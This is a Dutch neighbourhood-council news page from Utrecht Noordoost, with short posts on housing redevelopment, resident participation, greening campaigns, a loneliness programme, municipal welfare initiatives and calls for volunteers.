Nieuws

Duurzaamheid & Natuur | Verkeer & Milieu | Wonen & Ruimtelijke Ordening | Zorg & Welzijn (Jeugd & Volwassenen) | Communicatie | Wijkeconomie

Facebooktwittergoogle_pluspinterest

Sloop en nieuwbouw Lauwerecht

Startdocument sloop en nieuwbouw Lauwerecht 2&4 in de staatsliedenbuurt Bericht inhoud: Beste leden van de Wijkraad, Mitros heeft plannen voor sloop en nieuwbouw van huurwoningen in het projectgebied ‘Lauwerecht 2 en 4’ in de Staatsliedenbuurt. Omdat jullie ook actief zijn in de buurt wil ik jullie hier graag over informeren. Vandaag hebben alle buurtbewoners hier een brief over gehad en morgen verstuurd de gemeente een persbericht. Zie de bijlagen. Voorafgaand aan de eerste bijeenkomst met de buurt willen we jullie graag afzonderlijk spreken.   

Facebooktwittergoogle_pluspinterest

Werkconferentie Samen stad maken op de Utrechtse manier

Het verslag en de presentatie van 15 april. Op 15 april is teruggekoppeld welke inzichten de werkconferentie Samen stad maken op de Utrechtse manier heeft gebracht en hoe het programmateam dit wil verwerken. Tijdens de werkconferentie op 27 maart werd aan wethouder Anke Klein namens een groep actieve bewoners, de Utrechtse principes aangeboden.  Op 24 mei spreekt de wethouder met de aanbieders.

Er wordt in mei een gesprek gepland over de randvoorwaarden en kaders van de nieuwe buurt- en wijkplatforms. Uitgenodigd hiervoor worden actieve bewoners van wijkraden en buurtcomités, ondernemers, leden van het Maatschappelijk Netwerk Utrecht en studentenorganisatie. Na de besluitvorming in de gemeenteraad volgen de gesprekken per wijk over de organisatie van de nieuwe platforms.

De besluitvorming in de gemeenteraad over het actieprogramma staat gepland voor de vergadering in september.

Facebooktwittergoogle_pluspinterest

3 nieuwe locaties voor Tiny Forests gezocht in Utrecht!

Na een succesvolle plantdag in Utrecht op 2 april zijn we nu samen met gemeente Utrecht op zoek naar nog eens drie initiatiefnemers die in de stad Utrecht een Tiny Forest willen aanleggen.

 Ken jij in Utrecht een geschikte locatie en wil jij daar samen met een nabijgelegen school/BSO en buurtbewoners een minibos aanleggen? Dien dan je plan hier in: https://www.ivn.nl/tinyforest/initiatiefnemer-worden

 Naast het feit dat een Tiny Forest een ontzettend leuke, levendige plek in de buurt oplevert voor bewoners en schoolkinderen, biedt dit natuurlijk ook dé kans om vervolgens je ‘eigen’ Tiny Forest te onderzoeken op biodiversiteit of leuke natuuractiviteiten te organiseren!

Facebooktwittergoogle_pluspinterest

Utrechtse aanpak eenzaamheid

Afgelopen vrijdag is de Utrechtse aanpak eenzaamheid gelanceerd:  www.utrecht.nl/eenzaamheid

Ook bewonersinitiatieven en sociaal ondernemers leveren hierin een belangrijke bijdrage. Lunetten Wil Wel stond op het podium, de Geluks BV mocht nog haar verhaal doen voor RTV Utrecht. Utrecht in Dialoog was er, net als Oog voor Utrecht, Met je hart, het Danspaleis, het Wilde Westen, Gouden dagen, Straotpraot.
En we dagen ook andere initiatiefnemers uit een bijdrage te leveren aan één van de coalities of zelf een coalitie te starten.

Facebooktwittergoogle_pluspinterest

Bestrijding eikenprocessierups met natuurlijk middel

In de periode van maandag 29 april tot en met vrijdag 17 mei start de gemeente met de bestrijding van de eikenprocessierups. Op een aantal plekken in de stad, waaronder de Kögllaan en R.A. Kartinistraat, gebruikt de gemeente een natuurlijk bestrijdingsmiddel Nematoden om de eikenprocessierups te bestrijden. In dit wijkbericht leggen we hier meer over uit.

Lees hier het wijkbericht eikenprocessierups Kögllaan en R.A. Kartinistraat

Facebooktwittergoogle_pluspinterest

Wandelen in Voordorp later in heel Noordoost

Nu, elke dinsdagochtend, afgopen dinsdag voor het eerst, gaan we op pad in Voordorp. Iedereen kan aansluiten via een groepsapp. Heerlijk wandelen samen en schitterende tuinen van Voordorp bewonderen. Gezond en gezellig, ruim een uur wandelen en onderweg een kop koffie drinken!
Een mooi initiatief om inwoners van Voordorp met elkaar in contact te brengen. Dinsdagen om 10.15 uur. Verzamelen bij Steve Bikostraat 35.
Dit willen opzetten in elke buurt van Noordoost. Sluit je lekker aan, klets even met 1 van de dames of ik ‘Christian’.
De wijkraad vind het fantastische wat hier gedaan wordt. Sterke nog: we waren zelf net bezig hetzelfde op te zetten. Maaaaar je moet een gemotiveerde burger nooit links laten liggen, dus hier bieden we wat steun aan en laten we iedereen hun gang gaan.
Maar genoeg gepraat nu. Loop de volgende keer mee en laten we in alle buurten zulke spontane ontspannen groepjes opzetten. 😉
 

Facebooktwittergoogle_pluspinterest

Gerbrandystraat

Noordoost krijgt een fantastische nieuwe groep van verschillende woningen dot allemaal op de locatie van de oude belastingkantoor.
Gerbrandystraat 20 b.v. realiseert in opdracht van Syntrus Achmea Real Estate & Finance 487 appartementen aan de Gerbrandystraat in Utrecht. Er worden 287 woningen voor starters gerealiseerd en 200 zelfstandige studentenkamers. De toekomstige bewoners
kunnen gebruik maken van elektrische deelauto’s.  Inmiddels is er begonnen met de inpandige sloop.
Zie hier de bijlage:

Facebooktwittergoogle_pluspinterest

Buurtpact

Wist u dat: 1 op de 5 personen heeft dementie, 3 op de 5 vanaf 70 jaar te hoge bloeddruk,1 op de 5 is eenzaam, 1 of de  5 heeft een fobie, 1 op de 2 heeft last van overgewicht / obesity, 1 op 3 krijgen kanker en 90% ervan over de 50 jaar, 1 op de 3 heeft een betalingsachterstand, 1 op de 5 personen krijgt ooit een vorm van depressie. Volgens mij hoef ik niet meer te zeggen of meer uit te zoeken.

Vanaf 2019 gaat de gemeente Utrecht het buurtpact inzetten om twee doelen te bereiken. Het ene is het (nog) beter betrekken van bewoners bij de sociale ‘opgaven’ in hun buurt. Het tweede doel is betere samenwerking in de buurt tussen organisaties die in het sociaal domein actief zijn. Denk aan de buurtteams, de sociaal makelorganisatie DOCK, het jongerenwerk, artsen en SportUtrecht etc

Recentelijk heeft voorzitter Els Wegdam, Wijkraad Overvecht mij hiervan ingelicht. Ze vroeg: moeten we dit niet met alle wijkraden bespreken…?  Ik en de voorzitter Wijkraad Binnenstad zeiden onmiddellijk “ja”.  Gezien bovengenoemde cijfers kan niemand betwisten de noodzaak van deze actie. Ik wil dit ook direct in de wijkraad Noordoost gaan bespreken en de leden vragen om hiermee aan de slag te gaan.

https://www.utrecht.nl/zorg-en-onderwijs/samenleven-welzijn/welzijn-in-de-wijk/buurtpact-samenwerken-aan-de-buurt/

Zie hier de bijlages:

2019-03-De-weg-naar-het-Buurtpact

180928 Raadsbrief 25 september 2018 beleidsregel buurtnetwerken en wijkinformatiepunten door bewoners

beleidsregel buurtnetwerken en wijkinformatiepunten door bewoners

Facebooktwittergoogle_pluspinterest

HET VERKEER GAAT OM EN HOE!!! Lees dit fascinerende stuk van hoe het verkeer anders kan.

Initiatief wat getrokken wordt door OLC, Wijkraad WEST & NOORD WEST.   
Het wiel is ontstaan uit een groep bewoners die hebben erkent dat je niet een oplossing kan maken voor het verkeer in de stad zonder te praten met andere wijken.
Uitgangspunt voor het wiel is dat iedere plek in de stad te bereiken is met elke vervoersmiddel. Vervolgens moet het verkeerssysteem zo ingericht zijn dat natuurlijke keuzes gemaakt worden die passen bij een duurzame stad: in het centrum met de fiets en ov. Met de auto maximaal buitenom. Hierbij is het ook belangrijk dat op bepaalde plekken het tempo van verplaatsen met de auto heel erg om laag gaat zodat bewoners en bezoekers de neiging hebben voor de gewenste route en/of vervoersmiddel te kiezen.
Dat heeft voor iedereen in de stad impact omdat het van iedereen ander reisgedrag vraagt. Daar krijgen we met zijn allen ook wat voor terug in de vorm van leefbaarheid en mooie verblijfsplekken in de stad. We vragen hierbij een open mindset en vertrouwen dat we allemaal hiervoor een steentje moeten bijdragen.

Facebooktwittergoogle_pluspinterest

Over handhaving

Mijn naam is Bas Savenije en ik ben voorzitter van de wijkraad binnenstad.
Ik waardeer het initiatief om meer informatie tussen en over de verschillende wijkraden uit te wisselen en wil daar graag een bijdrage aan leveren vanuit de wijkraad binnenstad. Het onderwerp is handhaving en dit keert met een zekere regelmaat terug op de agenda van onze wijkraad.

 

Facebooktwittergoogle_pluspinterest

Aartsbisschop Romerostraat

Van de week ben ik naar onderstaande bijeenkomst geweest, dit samen met met mijn collega Nico van de wijkraad. Wat een fijn bijeenkomst. Open, helder, oplossingsgericht en alles mocht besproken worden. Over een maand komen we weer bij elkaar en dan zullen we de voorstellen bespreken.  Wat zijn de de plussen en de mins,,, welke voorstellen lossen alle problemen op. Kortom,,, ik heb er zin in en hoop dat het overal zo geworden is. Wat een verademing. Ga zo door Gemeente Utrecht.

Facebooktwittergoogle_pluspinterest

Presentatie participatie 15 april voor gesprek met wijkwethouders

Participatie en de volgende ronde:

Afgelopen maandag 15 maart is een terugkoppeling bijeenkomst geweest. (zie bijlage). Een volle zaal, heel inspirerend gesprekken en boeiend informatie. Vooral info van twee Ruimtemakers was buitengewoon bijzonder. Ze gaven gaan dat we prachtige sprongen gemaakt hebben alleen miste ze de info in de witte bloemblaadjes (bekijk de bijlage) –> deze waren nog niet voldoende meegenomen in het geheel. Ze hebben de ambtenaren namelijk hierom gevraagd om aan een debat deel te nemen . Alle aanwezig reageerde positief tegenover dit idee.  Een buitengewoon positieve sfeer heerste, iedereen luisterde naar elkaar, gaf elkaar ruimte om een eigen mening toe te lichten en niemand zei: “mijn mening is het enige mening”. Kortom we willen graag verder discussiëren en samen nog meer oplossingen verder zoeken bovenop alles wat al ontdekt is.

Wat wel gezegd moet worden: onze gespreksleidster ‘Fieke van der Burght’ was voortreffelijk!!!!

Facebooktwittergoogle_pluspinterest

Groei Utrecht

Utrecht groeit van 350.000 in 2018 naar bijna 455.000 inwoners in 2040. Utrecht, stad van gezond stedelijk leven voor iedereen…..

Tot het jaar 2040 neemt het inwoneraantal naar verwachting met ongeveer 107.000 toe. In Utrecht zetten we de kans die de groei biedt in om op alle fronten een nog betere stad te worden. Utrecht als dé stad van ‘Gezond Stedelijk Leven voor Iedereen’.

Utrecht is een van de meest aantrekkelijke steden van Nederland. Zo heeft Utrecht een prachtige historische binnenstad. Het vele groen en water in en om de stad draagt bij aan ontspanning dichtbij huis. Utrecht is een overzichtelijke stad met gevarieerde voorzieningen en voor ieder wat wils. Diversiteit, talent en saamhorigheid kenmerken de Utrechtse bevolking. In Utrecht zijn veel maatschappelijke partijen actief en is het aantal vrijwilligers ongekend hoog. De stad is het centrale trefpunt midden in het land en daarmee een ideale ontmoetingsplek. Dit alles maakt Utrecht volgens de EU dan ook tot één van de meest concurrerende regio’s van Europa. Utrechters, onderwijsinstellingen, bedrijven en gemeente zijn niet voor niets trots op hun stad!

Ik vind het erg leuk om in Utrecht te wonen eigenlijk. (…) Ik denk dat dat voor mij de charme van Utrecht is, dat er heel veel verschillende soorten mensen wonen. Ik zie als jongere veel andere jongeren en dat houdt de stad heel dynamisch. Er gebeurt veel. Je kunt veel mensen ontmoeten en het is gewoon heel open.

Bron uitspraak: Belevingsonderzoek Ferro Explore!


Foto: Bas van Hattum

Lees verder via de attachment Groei Stad

 

 

Facebooktwittergoogle_pluspinterest

Participeren

Dag Allemaal,
U kunt punten voor onze agenda ook aandragen voor aanstaande dinsdag. Wij moedig iedereen aan om te participeren. Kom langs, doe mee, we zijn flink aan het groeien en hebben denkers en doeners nodig om onze wijk fijner te maken voor iedereen. Via de link kunt u onze twee laatste verslagen lezen, een plattegrond en uiteraard onze agenda.
Een bloeiende groet, Christian
De twee versslagen:

Facebooktwittergoogle_pluspinterest

Notitie: samen maken we de Stad

Na aanleiding van de gezamenlijke opgestelde Wijkraad Notitie is onze gemeente verder aan de slag gegaan met het hele nieuwe participatie benadering. Het is een indrukwekkend document geworden met veel ambities (zie bijlage). Wij zijn ervan overtuigd dat iets geweldigs hieruit ontstaan kan.

De twijfel punten die de voorzitters nog hadden hebben we besproken met de wethouder in een persoonlijk gesprek (zie tweede bijlage). Op een buitengewoon proactieve manier zijn alle aanwezige wijkraad voorzitters in gesprek gegaan. We waren niet alleen natuurlijk, Wethouder Klein had twee Top ambtenaren meegenomen: Jochem Hoogenboom & Fieke van der Burght.  Beiden mensen gaven ons een gevoel van gezien en gehoord worden. Gezamenlijk waren onze ingebrachte punten met veel aandacht uitgebreid besproken. Het samen zitten en kijken hoe we samen veder konden optrekken was erg fijn voor iedereen nu te ervaren.

Hier het gesprek: Verslag gesprek Klein

Facebooktwittergoogle_pluspinterest

Participatieve weg samen

Enige tijd geleden heeft de wijkraden van Utrecht een notitie opgesteld en deze ingediend aan het college. Het was een brief waarin wij de wijkraden probeerden ons te verplaatsten in de schoenen de gemeentelijke apparaat. Dat is ons ook goed gelukt want we hebben bepaalde zaken beter kunnen toelichten en ook begrijpen waarom de gemeente bepaalde gedachten heeft. Lees onze notie en de gemeentelijke reactie erop.

Facebooktwittergoogle_pluspinterest

Meldingen

U kunt een melding doorgeven aan de gemeente. Bijvoorbeeld over afval, vervuiling, groen, onderhoud, reparaties, obstakels, verkeer, overlast, graffiti, woonfraude of bedrijven die zich niet aan milieuregels houden. Ook kunt u een melding doen als u een obstakel ziet waar bijvoorbeeld mensen in een rolstoel of slechtzienden last van hebben.

Doe een melding

Lees meer:

Slim Melden app

U kunt uw melding ook doorgeven via de Slim Melden app. Download de app in de Google Play Store of de Apple store.

Hoe doet u een melding?

Nadat u op de knop ‘Doe een melding’ hebt geklikt, komt u in een nieuw scherm.
Vul bij ‘Zoek op straatnaam’ de straat in.

Klik op de kaart op een groen icoontje voor een melding over bijvoorbeeld een bushokje of prullenbak. Of klik op de kaart op de plek waarover u iets wilt melden. Daar waar u op de kaart hebt geklikt verschijnt een geel icoontje. Rechts naast de kaart verschijnt een blauwe knop waar u uw melding kunt doorgeven.

Geef bij de toelichting een korte omschrijving. Deze tekst verschijnt op de website. Stuur eventueel een foto mee om de melding duidelijker te maken.

Algemene meldingen worden getoond op de kaart. Meldingen onder de categorie Overlast worden niet getoond op de kaart, omdat deze privacygevoelige informatie kunnen bevatten.

Spoed

 • Gaat uw melding over openbare orde en veiligheid en heeft uw melding spoed? Neem dan altijd contact op met de politie, telefoonnummer 112 of 0900 – 88 44.
 • Gaat uw melding over geluidsoverlast bij evenementen en heeft het spoed? Bel met 14 030. Kies buiten kantoortijden ‘geluidsklachten bij evenementen’.
 • Gaat uw melding over een bedrijf dat de milieuregels overtreedt en heeft het spoed? Met dringende klachten over bijvoorbeeld stank van bedrijven kunt u buiten kantoortijden dag en nacht bellen met de Regionale Uitvoeringsdienst Utrecht.

Klacht

Hebt u een klacht over de gemeente of de medewerkers? Dan kunt u een klacht indienen.

Vraag, wens, idee

U kunt ook een vraag stellen of uw wens of idee aan ons doorgeven.

 

Facebooktwittergoogle_pluspinterest

Digitale Huishoudboekje breidt uit naar 300 deelnemers

Het komend halfjaar worden 300 Utrechters op een innovatieve manier geholpen bij het beheren van hun geld. De gemeente breidt samen met partners in de stad het digitale Huishoudboekje uit. Het Huishoudboekje geeft Utrechters overzicht over hun financiën en helpt bij verminderen van geldstress.  

“De inkomsten van de deelnemende Utrechters komen binnen bij de gemeente. Van die inkomsten betalen we via het Huishoudboekje de vaste lasten voor de woning, energie, drinkwater en zorgverzekering.”, legt wethouder Linda Voortman uit. “Het bedrag dat overblijft, krijgen de deelnemers als leefgeld op hun rekening gestort. Utrechters houden zo het overzicht over hun financiën en kunnen zich focussen op andere zaken, zoals werk en school. Schulden worden zo ook voorkomen”.

Deelnemers
Komend half jaar is er plek voor 300 nieuwe deelnemers. Ondertussen gaan we verder met de ontwikkeling van de dienstverlening, zodat in de toekomst meer Utrechters kunnen meedoen. Het Huishoudboekje is voor iedereen die hulp kan gebruiken bij het behouden van financieel overzicht. De gemeente kijkt wel of het Huishoudboekje de juiste hulp is. Als de inkomsten lager zijn dan de uitgaven op het moment dat iemand in het Huishoudboekje wil, wordt aanvullende hulp georganiseerd.

Over het Huishoudboekje
Deelnemers houden overzicht over hun financiën via de (mobiele) site van het Huishoudboekje. Op dit moment maken 20 inwoners hier gebruik van. Zij geven aan zich minder zorgen te maken om de financiën. Het Huishoudboekje was één van de eerste overheidsprojecten waarin blockchaintechnologie werd toegepast. Maar de blockchaintechnologie bleek niet verenigbaar met het beschermen van de privacy. Daarom gebruikt de gemeente nu een database technologie waarmee de privacy wel is geborgd en dezelfde kwaliteit wordt bereikt.

Wilt u meedoen? Meld u aan!
Lees meer over het Huishoudboekje en hoe u zich kunt aanmelden op www.utrecht.nl/huishoudboekje.

 

Facebooktwittergoogle_pluspinterest

Meer Utrechters uit de bijstand aan het werk

In 2018 was de uitstroom van inwoners met een bijstandsuitkering naar werk 1.452 ten opzichte van 1.139 een jaar eerder. De uitstroom naar werk was 49% van de totale uitstroom uit de bijstand in 2018. Het aantal Utrechtse huishoudens met een bijstandsuitkering daalde het afgelopen jaar tot 9.634. Een jaar geleden waren dit 10.124 huishoudens.  

Linda Voortman, wethouder Werk en Inkomen: “We zijn samen met partners aan de slag om Utrechters zoveel mogelijk te stimuleren mee te doen. We willen kansen voor Utrechters benutten en hen stappen laten zetten naar een betaalde baan of activering, bijvoorbeeld door intensievere begeleiding en een meer persoonlijke aanpak.”

De huidige arbeidsmarkt biedt kansen voor inwoners om stappen te maken richting werk. Ook voor Utrechters voor wie het krijgen van werk minder makkelijk is. Op die manier kunnen Utrechters meeprofiteren van de aantrekkende economie. Afgelopen jaar zijn extra acties ingezet om werkzoekenden naar werk te begeleiden. Voor het ontwikkelen van een gerichte persoonlijke aanpak is de verbinding met de betreffende groep met een bijstandsuitkering belangrijk.

Een persoonlijke aanpak, aandacht voor de individuele omstandigheden en ondersteuning op maat werken goed. Er was meer aandacht voor de uitbreiding van het aantal uren voor inwoners die deeltijd werken, voor kinderopvang en voor partners in de bijstand. Daarnaast had de gemeente extra aandacht voor werkzoekenden die afspraken niet nakwamen. De uitstroom was door de extra acties drie tot vier keer hoger dan bij reguliere dienstverlening. De gemeente onderzoekt of de aanpak gecontinueerd en verbreed wordt en werkt hierin samen met werkgevers en partners uit de stad.

 

Facebooktwittergoogle_pluspinterest

Wijkopgave Noordoost

Op dit moment werken we aan de wijkopgave van Noordoost. De wijkopgave bevat de speerpunten en projecten voor Noordoost. Voor de wijkopgave halen we op verschillende manieren informatie op bij bewoners, ondernemers, bezoekers en organisaties in de wijk. Bekijk de eerste bijlage als een soort preview en de andere 2 als referentie materiaal van de afgelopen jaren

Eerste bijlage
Referentie materiaal : Referentie 1 , Referentie 2

 

 

Facebooktwittergoogle_pluspinterest

Tegel eruit en Plant erin

Vandaag op de tuinen van Intratuin heeft deze actie plaatst gevonden. Ik ben zelf naar Intratuin op de koning’s weg geweest in Utrecht en het was razend druk. De dames van Groei en Bloei Utrecht waren constant bezig om alle klanten en tegels te bedienen. Ze waren bezig met een derde pallet … de klanten en stoep tegels bleven aankomen.

 Tuinvereniging Groei & Bloei organiseert in samenwerking met Intratuin op 23 maart weer de succesvolle actie van: neem zelf een steen uit je tuin mee en hier krijg je gratis twee planten voor terug! Deze dag kun je tussen 10 en 15 uur bij Intratuin Leidsche Rijn en Koningsweg terecht bij de stand van Groei en Bloei Utrecht. Deze actie wordt ook ondersteund door IVN Natuureducatie, die het belangrijk vindt dat tuinen groener worden en #waterproof030 (zie YouTube)!

Waarom belangrijk voor de natuur?

In een tuin met allemaal stenen kan het regenwater niet de grond in zakken naar het grondwater. Bij zware regenval kunnen de putten het water niet aan en krijgen we overlast van rioolwater op straat. Bij extreme warmte en droogte is het in ‘stenen’ tuinen veel heter, want planten verdampen water waardoor het koeler wordt. Afgelopen zomer zijn er vele bomen dood gegaan doordat er te weinig water in de bodem is gekomen.

Mede door de ‘verstening’ van de tuinen (en het gebruik van insecticide) is in de afgelopen 25 jaar 75% van de bijen, vlinders en andere insecten uit ons groen verdwenen. De hommelvlinder is daardoor bv. al uitgestorven.

Nu doen!

Maak gebruik van deze actie voor het welzijn van mens en natuur én uw portemonnee! Twee plantjes per klant, maar meer stenen inleveren juichen we alleen maar toe.

Infoavond

Op maandag 13 mei om 20 uur organiseert het IVN Vecht & Plassengebied in samenwerking met stadsecoloog Gitty Korsuize een informatiebijeenkomst over Operatiesteenbreek & Waterproof030
Locatie: Hof ’t Spoor, Operettelaan 629 Utrecht (Terwijde Leidsche Rijn). Aanmelden kan via secretariaat@ivnvechtplassen.org. Andere natuuractiviteiten kunt u vinden op www.utrecht.groei.nl en www.ivn.nl

Facebooktwittergoogle_pluspinterest

Doe iets voor je Buurt: Pit én 1.000 euro voor het project!

Vorige jaar werden wij geattendeerd door Ans Hobbelink, bestuurder bij de landelijke organisatie voor hobby tuinders, oftewel AVVN, over de “Doe iets voor je Buurt” project.

Kern met Pit daagt mensen uit die een droom hebben voor hun eigen buurt, dit binnen één jaar te realiseren. Het kan om allerlei ideeën en initiatieven gaan: van het opzetten van een buurtmoestuin, speeltuin, tafeltje dekje; tot het organiseren van een dorpstoneelstuk. Als het je directe omgeving maar verbetert of een impuls geeft. Lukt het je om binnen een jaar het idee te realiseren? Dan ontvang je het predicaat Kern met Pit én 1.000 euro voor het project!

Ans Hobbelink

https://www.kernmetpit.nl/default.aspx

 

Facebooktwittergoogle_pluspinterest

Tegel eruit, plant erin!

Tegel eruit, plant erin!

 

Tuinvereniging Groei & Bloei organiseert in samenwerking met Intratuin op 23 maart weer de succesvolle actie van: neem zelf een steen uit je tuin mee en hier krijg je gratis twee planten voor terug! Op deze dag kun je tussen 10 en 15 uur bij Intratuin Leidsche Rijn en Koningsweg terecht bij de stand van Groei en Bloei Utrecht.

Het is belangrijk voor onze natuur dat tuinen groener worden. Met Operatie Steenbreek (#Steenbreek actie) willen wij iedereen in Nederland enthousiasmeren om de tuin te vergroenen. Met kleine, lokale initiatieven maken we het verschil. Deze actie wordt onder andere ondersteund door het IVN, instituut voor natuureducatie en duurzaamheid en Utrecht Natuurlijk (#waterproof030).

 

Waarom is Operatie Steenbreek belangrijk voor de natuur?

In een tuin met allemaal stenen kan het regenwater niet de grond in zakken naar het grondwater. Het weer wordt extremer. Bij zware regenval kunnen de putten het water niet aan en krijgen we overlast van rioolwater op straat. Bij extreme warmte en droogte is het in ‘stenen’ tuinen veel heter, want planten verdampen water waardoor het koeler wordt. Door de hitte zijn afgelopen zomer zijn veel bomen dood gegaan doordat er te weinig water in de bodem kon komen.

Mede door de ‘verstening’ van de tuinen (en het gebruik van insecticiden) is in de afgelopen 25 jaar 75% van de bijen, vlinders en andere insecten uit onze omgeving  verdwenen. En er zijn zelfs soorten definitief verdwenen, bijvoorbeeld de hommelvlinder.

 

Ook een Informatieavond

Ook IVN, afdeling Vecht en Plassengebied wil zijn steentje (plantje) bijdragen en organiseert daarom op donderdag 16 mei om 20 uur in samenwerking met stadsecoloog Gitty Korsuize een informatieavond over Operatie Steenbreek.  (Locatie wordt later vermeld). Voor meer informatie kunt u contact opnemen met marijkezoetelief@gmail.com.  Andere natuuractiviteiten kunt u vinden op www.utrecht.groei.nl en www.ivn.nl.

 

Dus Nu doen!

Maak gebruik van deze Groei en Bloei actie voor het welzijn van mens en

natuur én uw portemonnee! Twee plantjes per klant, maar meer stenen

inleveren juichen we alleen maar toe.

 

Facebooktwittergoogle_pluspinterest

De Gaard

De wijk Utrecht is aan veel veranderingen onderhevig, daarom is er een visie geschreven hoe de wijk er over 10 jaar mogelijk uit zal zien.

Hebben we nog openbaar groen in 2025?
Hoe staat het in 2025 met alle nieuwbouwprojecten: de Veemarkt, de Gaard, Careyn, de Groene Kop, de Staatsliedenbuurt?
Hebben we een ontmoetingsplein op de Eykmanlaan?
Zijn er veel de Duurzameprojecten geïmplementeerd?
En vooral is er dan eindelijk schone lucht?
Zijn er meer kleinschalige projecten als Wederzijds?
Rijden op de fiets of in de elektrische auto of rijdt er een schone tram door de middenberm van de Kardinaal de Jongweg?
Hoe is het met de sociale cohesie gesteld?

Lees verder in de wijkvisie 2015-2025

Zie pagina’s 55 tot 57

Facebooktwittergoogle_pluspinterest

Frans Soeterbroek

Frans Soeterbroek woont in de wijk Wittevrouwen en is in het dagelijks leven adviseur op het terrein van wat hij ‘samen stad maken’ noemt. Hij noemt zich de Ruimtemaker en adviseert gemeenten hoe je stads- gebieds- en wijkontwikkeling samen met de bewoners aanpakt. Weg van het traditionele participatiebeleid maar veel meer denken in termen van democratische vernieuwing, maatschappelijk ondernemerschap en sterke buurtgemeenschappen.   Ruim vijf jaar geleden is hij samen met initiatiefnemers uit de hele stad het netwerk’ Utrechtse Ruimtemakers’ gestart dat tot doel heeft om het klimaat voor bewonersinitiatieven in de stad te verbeteren.  Dat zouden we niet alleen terug moeten zien in bijvoorbeeld een initiatievenfonds maar ook in het grond- vastgoed- en aanbestedingsbeleid van de gemeente. En daar valt nog veel te verbeteren. Frans doe dit om zijn kennis ook in zijn eigen stad in te zetten maar ook gewoon omdat hij zich druk maakt over wat hij in de stad ziet gebeuren

 

Facebooktwittergoogle_pluspinterest

Herstart Wijkraad Noordoost

Wijkraad Noordoost zoekt vrijwilligers als leden

Wilt u zich hiervoor inzetten en tegelijk Noordoost beter leren kennen, kijk dan op de website www.wijkraadnoordoost.nl

Thema’s zijn: verkeer, groen, veiligheid, eenzaamheid, langdurige werkloosheid, armoede,  schuldsanering , energie transitie etc. Misschien weet De wijkraad is van de wijk en u bent “de wijk.”

Mail of bel, Christiaan Naethuys, voorzitter, 0684803219, c.naethuys@gmail.com

 

 

(Klik op deze link om beter te zien)

 

 

 

 

 

Facebooktwittergoogle_pluspinterest

Nieuwe websitebeheerder

Ik ben Isaac Gielissen. Vanaf nu ben ik de nieuwe websitebeheerder van Wijkraad Utrecht Noordoost. Ik begon vorig jaar met websites bouwen. De eerste website bouwde ik voor mijn oom. Op deze manier kon ik ervaring opdoen. Daarna begon mijn websiteonderneming langzaam te lopen. Ik kreeg verschillende opdrachten. Daardoor werd ik erg vaardig in het bouwen. Voorbeelden van opdrachtgevers zijn: fysiotherapeuten, acteurs, psychologen, tandartsen en nog meer. Ik probeer de websites altijd zo te maken dat ze naderhand gemakkelijk aan te passen zijn. Het is een supertof baantje om naast school te doen. Ik vind het veel leuker dan vakkenvullen of oppassen. Heb je iets voor de website Wijkraad Noordoost stuur mij dan een e-mail naar: info@wijkraadnoordoost.nl.

Facebooktwittergoogle_pluspinterest

Kwetsbare buurten

Een bewonersplatform in de Staatsliedenbuurt: Hoe zit dat? Kan dat? Gaat dat wel lukken? Is het nodig? Wie wonen daar? Wat gaat daar de komende tijd gebeuren? Wie betreft het ? Hoe zullen mensen daarop  reageren? Zijn dit thema’s die als een rode draad door deze buurt zullen gaan?
Allemaal zeer belangrijke vragen als je wat wil doen en met name als je wilt dat wat je doet, er ook toe doet. Generaliserend gezegd hebben we het goed als wijk.  Dat kan gezegd worden maar ook wij zagen al in het begin van de Wijkraad geschiedenis dat we op een paar plekken inwoners hebben die kwetsbaarder waren dan de rest en hiervoor hebben we ons ingezet.

Deze aanpak wil niet zeggen dat de klus geklaard is. Sommige kwetsbare mensen kunnen dusdanig geholpen worden dat ze zelf een nieuwe vorm van leven ontdekken/leren waarmee ze zelf, ongehinderd het pad verder kunnen belopen. Anderen zullen dat punt niet bereiken en wij die het wel zelfstandig belopen kunnen zullen hen hiermee blijven helpen.

In 2017 heeft de Wijkraad Noordoost een volgende “BUURT AANPAK” fase aangepakt:

“We starten in april met een bewonersplatform, opererend vanuit Buurtcentrum De Leeuw, en bestaande uit ongeveer 8 tot 10 personen. Liefst zoveel mogelijk gespreid uit het gebied; oud- en nieuwbouw, mannen en vrouwen, jongeren en ouderen. Zij die zich hiervoor belangeloos willen inzetten.” Lees in de volgende link het begin van een bewoners platform Staatsliedenbuurt:

http://www.wijkraadnoordoost.nl/oproep-bewonersplatform-omgeving-lauwerechtstaatsliedenbuurt/

Daarmee is de klus natuurlijk nog steeds niet geklaard.

“Na een half jaar houdt onze opdracht via de Wijkraad Noordoost op. De deelnemers aan het Bewonersplatform hebben gesteld dat zij graag door willen met het Bewonersplatform…”
Lees wat de bewoners willen: http://www.thesocialfirm.nl/projecten.html

Recentelijk heb ik Christian Naethuys de twee trekkers van The Social Firm (opstarters van het bewonersplatform) mogen ontmoeten tijdens een gemeentelijke participatie conference. Indrukwekkend is mijn omschrijving van hen. Spontaan, sociaal, intelligent, betrokken, ach de superlatieven komen tekort, 2 super sociale power vrouwen  http://www.thesocialfirm.nl/

We raden u deze twee dames aan: ze staan graag voor u klaar en kunnen heel veel bereiken voor JULLIE bewoners.

Facebooktwittergoogle_pluspinterest

Groen, bomen, parken, bereikbaarheid, kwaliteit, normen etc.

Dit zijn punten waar de Wijkraad NoordOost zich vele jaren mee bezig heeft gehouden. Wat groen in de wijk betreft en hierbij bedoel ik in het bijzonder “zelf beheer” en hoe is dat tot stand gekomen? Jaren geleden, in een bijna vergeten college, was er een wethouder met voortschrijdend inzicht, daarmee verwijs ik  naar Robert Giesberts, hij was toen verantwoordelijk voor zowel groen als participatie. Deze man heeft alle Wijkraden aangespoord zich te verdiepen in allerlei onderwerpen, ‘ga de grenzen verkennen’ zei hij, ga naar de bewoners toe en vraag wat je namens hen op moet pakken. Zodoende is de Wijkraad NoordOost destijds aan de slag gegaan via een grote wijkraadpleging met allerlei onderwerpen, (deze zijn overigens nog te vinden op onze website).

http://www.wijkraadnoordoost.nl/wp-content/uploads/2014/10/Rapport-Wijkpeiling-Noordoost-2007-Niels2.pdf     2006 / 2007
http://www.wijkraadnoordoost.nl/wp-content/uploads/2014/10/Rapport-WRpleging-20071.pdf   2007 / 2008

